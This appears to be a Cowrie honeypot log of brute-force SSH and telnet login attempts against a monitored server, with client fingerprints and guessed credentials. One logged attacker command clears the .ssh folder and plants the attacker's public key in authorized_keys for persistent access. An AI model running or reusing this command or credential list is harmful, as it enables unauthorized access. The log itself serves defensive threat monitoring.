{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36945,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b950ec8c0d2","protocol":"telnet","message":"New connection: 212.227.235.229:36945 (1.2.3.4:23) [session: 4b950ec8c0d2]","sensor":"my-vps","timestamp":"2025-09-09T02:39:07.272658Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:39:07.440909Z","src_ip":"212.227.235.229","session":"397defc5eb0c"}
{"eventid":"cowrie.session.closed","duration":13.781119108200073,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:08.091769Z","src_ip":"212.227.235.229","session":"ca43cfd8453b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36974,"dst_ip":"1.2.3.4","dst_port":23,"session":"8260d0a573a1","protocol":"telnet","message":"New connection: 212.227.235.229:36974 (1.2.3.4:23) [session: 8260d0a573a1]","sensor":"my-vps","timestamp":"2025-09-09T02:39:08.328779Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123456","message":"login attempt [ubuntu/abc123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:39:08.460810Z","src_ip":"212.227.235.229","session":"397defc5eb0c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:09.721021Z","src_ip":"212.227.235.229","session":"397defc5eb0c"}
{"eventid":"cowrie.session.closed","duration":13.842872619628906,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:10.929075Z","src_ip":"212.227.235.229","session":"c55f91f9d9fc"}
{"eventid":"cowrie.session.closed","duration":13.71923565864563,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:11.175584Z","src_ip":"212.227.235.229","session":"787acb3d0cd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36985,"dst_ip":"1.2.3.4","dst_port":23,"session":"e572c4583d5b","protocol":"telnet","message":"New connection: 212.227.235.229:36985 (1.2.3.4:23) [session: e572c4583d5b]","sensor":"my-vps","timestamp":"2025-09-09T02:39:11.201090Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36994,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb606b99adc3","protocol":"telnet","message":"New connection: 212.227.235.229:36994 (1.2.3.4:23) [session: eb606b99adc3]","sensor":"my-vps","timestamp":"2025-09-09T02:39:11.379777Z"}
{"eventid":"cowrie.session.closed","duration":12.771673917770386,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:12.791557Z","src_ip":"212.227.235.229","session":"05cf671664e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37004,"dst_ip":"1.2.3.4","dst_port":23,"session":"053b87145408","protocol":"telnet","message":"New connection: 212.227.235.229:37004 (1.2.3.4:23) [session: 053b87145408]","sensor":"my-vps","timestamp":"2025-09-09T02:39:13.030225Z"}
{"eventid":"cowrie.session.closed","duration":12.981582403182983,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:17.019421Z","src_ip":"212.227.235.229","session":"25a5e058b512"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37045,"dst_ip":"1.2.3.4","dst_port":23,"session":"56f4d829992a","protocol":"telnet","message":"New connection: 212.227.235.229:37045 (1.2.3.4:23) [session: 56f4d829992a]","sensor":"my-vps","timestamp":"2025-09-09T02:39:17.219323Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51934,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe1b26eb4268","protocol":"ssh","message":"New connection: 212.227.235.229:51934 (1.2.3.4:22) [session: fe1b26eb4268]","sensor":"my-vps","timestamp":"2025-09-09T02:39:20.391008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:39:20.392844Z","src_ip":"212.227.235.229","session":"fe1b26eb4268"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:39:20.641681Z","src_ip":"212.227.235.229","session":"fe1b26eb4268"}
{"eventid":"cowrie.session.closed","duration":13.464111804962158,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:20.736701Z","src_ip":"212.227.235.229","session":"4b950ec8c0d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37174,"dst_ip":"1.2.3.4","dst_port":23,"session":"4434d0603d85","protocol":"telnet","message":"New connection: 212.227.235.229:37174 (1.2.3.4:23) [session: 4434d0603d85]","sensor":"my-vps","timestamp":"2025-09-09T02:39:20.968973Z"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"gbase","message":"login attempt [gbase/gbase] failed","sensor":"my-vps","timestamp":"2025-09-09T02:39:21.645411Z","src_ip":"212.227.235.229","session":"fe1b26eb4268"}
{"eventid":"cowrie.session.closed","duration":13.342291355133057,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:21.670996Z","src_ip":"212.227.235.229","session":"8260d0a573a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37181,"dst_ip":"1.2.3.4","dst_port":23,"session":"100b5365ec22","protocol":"telnet","message":"New connection: 212.227.235.229:37181 (1.2.3.4:23) [session: 100b5365ec22]","sensor":"my-vps","timestamp":"2025-09-09T02:39:22.057779Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:22.899734Z","src_ip":"212.227.235.229","session":"fe1b26eb4268"}
{"eventid":"cowrie.session.closed","duration":13.646595239639282,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:24.847623Z","src_ip":"212.227.235.229","session":"e572c4583d5b"}
{"eventid":"cowrie.session.closed","duration":13.688202142715454,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:25.067930Z","src_ip":"212.227.235.229","session":"eb606b99adc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37201,"dst_ip":"1.2.3.4","dst_port":23,"session":"e60c84fac3c5","protocol":"telnet","message":"New connection: 212.227.235.229:37201 (1.2.3.4:23) [session: e60c84fac3c5]","sensor":"my-vps","timestamp":"2025-09-09T02:39:25.113010Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37209,"dst_ip":"1.2.3.4","dst_port":23,"session":"da6a683d1f34","protocol":"telnet","message":"New connection: 212.227.235.229:37209 (1.2.3.4:23) [session: da6a683d1f34]","sensor":"my-vps","timestamp":"2025-09-09T02:39:25.320190Z"}
{"eventid":"cowrie.session.closed","duration":13.707628965377808,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:26.737754Z","src_ip":"212.227.235.229","session":"053b87145408"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37220,"dst_ip":"1.2.3.4","dst_port":23,"session":"385c031ea81c","protocol":"telnet","message":"New connection: 212.227.235.229:37220 (1.2.3.4:23) [session: 385c031ea81c]","sensor":"my-vps","timestamp":"2025-09-09T02:39:26.983202Z"}
{"eventid":"cowrie.session.closed","duration":13.63387393951416,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:30.853131Z","src_ip":"212.227.235.229","session":"56f4d829992a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37365,"dst_ip":"1.2.3.4","dst_port":23,"session":"287d05e28f7d","protocol":"telnet","message":"New connection: 212.227.235.229:37365 (1.2.3.4:23) [session: 287d05e28f7d]","sensor":"my-vps","timestamp":"2025-09-09T02:39:31.123112Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56062,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e8aa136a6f7","protocol":"ssh","message":"New connection: 212.227.125.160:56062 (1.2.3.4:22) [session: 4e8aa136a6f7]","sensor":"my-vps","timestamp":"2025-09-09T02:39:33.276296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:39:33.277096Z","src_ip":"212.227.125.160","session":"4e8aa136a6f7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T02:39:33.544564Z","src_ip":"212.227.125.160","session":"4e8aa136a6f7"}
{"eventid":"cowrie.session.closed","duration":12.881617784500122,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:33.850515Z","src_ip":"212.227.235.229","session":"4434d0603d85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37388,"dst_ip":"1.2.3.4","dst_port":23,"session":"2047af5d7691","protocol":"telnet","message":"New connection: 212.227.235.229:37388 (1.2.3.4:23) [session: 2047af5d7691]","sensor":"my-vps","timestamp":"2025-09-09T02:39:34.178046Z"}
{"eventid":"cowrie.session.closed","duration":12.701943159103394,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:34.759632Z","src_ip":"212.227.235.229","session":"100b5365ec22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37394,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ba0d94a9d11","protocol":"telnet","message":"New connection: 212.227.235.229:37394 (1.2.3.4:23) [session: 2ba0d94a9d11]","sensor":"my-vps","timestamp":"2025-09-09T02:39:34.980122Z"}
{"eventid":"cowrie.session.closed","duration":13.594871520996094,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:38.707807Z","src_ip":"212.227.235.229","session":"e60c84fac3c5"}
{"eventid":"cowrie.session.closed","duration":13.570086002349854,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:38.890207Z","src_ip":"212.227.235.229","session":"da6a683d1f34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37474,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c707686e136","protocol":"telnet","message":"New connection: 212.227.235.229:37474 (1.2.3.4:23) [session: 5c707686e136]","sensor":"my-vps","timestamp":"2025-09-09T02:39:38.968917Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11788,"dst_ip":"1.2.3.4","dst_port":22,"session":"18572e26c54a","protocol":"ssh","message":"New connection: 185.152.45.241:11788 (1.2.3.4:22) [session: 18572e26c54a]","sensor":"my-vps","timestamp":"2025-09-09T02:39:38.973792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:39:38.975148Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.048941Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37519,"dst_ip":"1.2.3.4","dst_port":23,"session":"9eddfadfceca","protocol":"telnet","message":"New connection: 212.227.235.229:37519 (1.2.3.4:23) [session: 9eddfadfceca]","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.202737Z"}
{"eventid":"cowrie.login.success","username":"root","password":"quepasa","message":"login attempt [root/quepasa] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.324676Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:39:39.482617Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.483365Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.484283Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.539013Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:39:39.692433Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.692929Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.744104Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.744905Z","src_ip":"185.152.45.241","session":"18572e26c54a"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11789,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3486b8dacd8","protocol":"ssh","message":"New connection: 185.152.45.241:11789 (1.2.3.4:22) [session: a3486b8dacd8]","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.783929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.790124Z","src_ip":"185.152.45.241","session":"a3486b8dacd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:39:39.833191Z","src_ip":"185.152.45.241","session":"a3486b8dacd8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:39:40.014480Z","src_ip":"185.152.45.241","session":"a3486b8dacd8"}
{"eventid":"cowrie.session.closed","duration":13.903770923614502,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:40.886876Z","src_ip":"212.227.235.229","session":"385c031ea81c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.059641Z","src_ip":"185.152.45.241","session":"a3486b8dacd8"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11786,"dst_ip":"1.2.3.4","dst_port":22,"session":"c52adcc67aa1","protocol":"ssh","message":"New connection: 185.152.45.241:11786 (1.2.3.4:22) [session: c52adcc67aa1]","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.103818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.107906Z","src_ip":"185.152.45.241","session":"c52adcc67aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37555,"dst_ip":"1.2.3.4","dst_port":23,"session":"6bc083aae47a","protocol":"telnet","message":"New connection: 212.227.235.229:37555 (1.2.3.4:23) [session: 6bc083aae47a]","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.134513Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.155033Z","src_ip":"185.152.45.241","session":"c52adcc67aa1"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.276367Z","src_ip":"212.227.125.160","session":"4e8aa136a6f7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:39:41.333371Z","src_ip":"185.152.45.241","session":"c52adcc67aa1"}
